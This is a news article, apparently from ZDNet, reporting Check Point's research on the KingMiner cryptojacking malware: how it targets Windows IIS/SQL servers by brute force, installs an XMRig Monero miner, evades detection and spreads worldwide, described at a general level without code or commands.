KingMiner malware hijacks the full power of Windows Server CPUs

Attack rates are rising and detection rates are falling.
Written by Charlie Osborne, Contributing Writer

Cryptojacking, the hijacking of PCs and systems for the purpose of stealing CPU power in order to covertly mine for cryptocurrency, is becoming a thorn in the side of individuals and businesses alike.

One in three organizations now says they've been targeted by cryptocurrency mining malware.

A university was recently forced to shut down its entire network to stop a cryptojacking attack, and in Japan, the first prison sentence has been issued in the country's history in relation to a crypjacking scheme.

Cryptojacking, which most often involves mining for Monero (XMR) and Ethereum (ETH), can be difficult to detect if CPU usage theft is limited, and as funds are transferred to attacker wallets in real-time, these techniques are becoming more popular with attackers who may have in the past relied on ransomware, which is not guaranteed to provide an illegal payout.

On Thursday, researchers from Check Point said in a blog post that one such form of cryptomining malware, known as KingMiner, first appeared in June this year and is now out in the wild as a new-and-improved variant.

The malware generally targets IIS/SQL Microsoft Servers using brute-force attacks in order to gain the credentials necessary to compromise a server. Once access is granted, a .sct Windows Scriptlet file is downloaded and executed on the victim's machine.

This script scans and detects the CPU architecture of the machine and downloads a payload tailored for the CPU in use. The payload appears to be a .zip but is actually an XML file which the researchers say will "bypass emulation attempts."

It is worth noting that if older versions of the attack files are found on the victim machine, these files will be deleted by the new infection.

CNET: Secret Facebook-FBI ruling must be made public, ACLU and EFF say

Once extracted, the malware payload creates a set of new registry keys and executes an XMRig miner file, designed for mining Monero.

The miner is configured to use 75 percent of CPU capacity, but potentially due to coding errors, will actually utilize 100 percent of the CPU.

To make it more difficult to track or issue attribution to the threat actor, the KingMiner's mining pool has been made private and the API has been turned off. In addition, the wallet has never been used in public mining pools, and so it is not possible for the researchers to know what domains are in use -- or how many Monero coins have been mined through the attacks.

TechRepublic: How tech leaders at enterprise companies can be more inclusive

However, Check Point has tracked "widespread" infections from Mexico to India, and Norway to Israel.

The new version of KingMiner is being deployed with two other variants, and the malware's operators appear to be continually improving the malware -- with a particular focus on avoiding emulation and detection.

See also: This worm spreads a fileless version of the Trojan Bladabindi

"The attacker employs various evasion techniques to bypass emulation and detection methods, and, as a result, several detection engines have noted significantly reduced detection rates," the cybersecurity firm says. "Based on our analysis of sensor logs, there is a steady rise in the number of KingMiner attack attempts."

Check Point says that within KingMiner's code, there is also a vast array of placeholders in the code for future updates, and so the malware may become a more prevalent threat in the future.

Our top choices for tech gifts

Previous and related coverage

Editorial standards